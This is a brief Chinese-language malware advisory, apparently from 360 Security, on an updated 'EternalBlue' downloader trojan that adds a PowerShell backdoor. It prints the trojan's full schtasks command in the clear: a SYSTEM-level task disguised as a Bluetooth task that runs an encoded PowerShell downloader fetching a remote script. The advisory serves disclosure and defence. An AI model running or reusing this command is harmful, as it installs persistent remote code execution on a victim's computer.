前不久,360安全大腦預警了《驅動人生傳播永恆之藍下載器木馬》,今天上午,“永恆之藍”下載器木馬再次更新。此次更新通過服務器調整雲控指令,實現對木馬下載模塊的更新,這也體現出了此類下載器木馬的靈活性—可隨時更新木馬組件。下圖是新的攻擊模塊下載地址:
這次更新的文件為之前的“永恆之藍”漏洞攻擊組件,保留了之前永恆之藍漏洞攻擊的模塊,新增加一個powershell後門,同時更新了木馬程序落地的名稱。
其中powershell的後門通過註冊一個計劃任務實現:
命令行:C:\WINDOWS\system32\cmd.exe /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:05:00 /tn "\Microsoft\windows\Bluetooths" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcgAuAG0AaQBuAGkAYwBlAG4ALgBnAGEALwByAD8AcAAnACkA" /F
解碼之後,利用powershell執行這一段腳本:'hxxp://r.minicen.ga/r?p'
目前看,這個域名剛剛註冊,還沒有做解析,後續可以通過這段腳本,長期駐留用戶計算機,下發攻擊腳本。
使用360安全衛士的用戶無須擔心,360安全衛士可攔截和查殺此類木馬和後門。
閱讀更多 360安全衛士 的文章
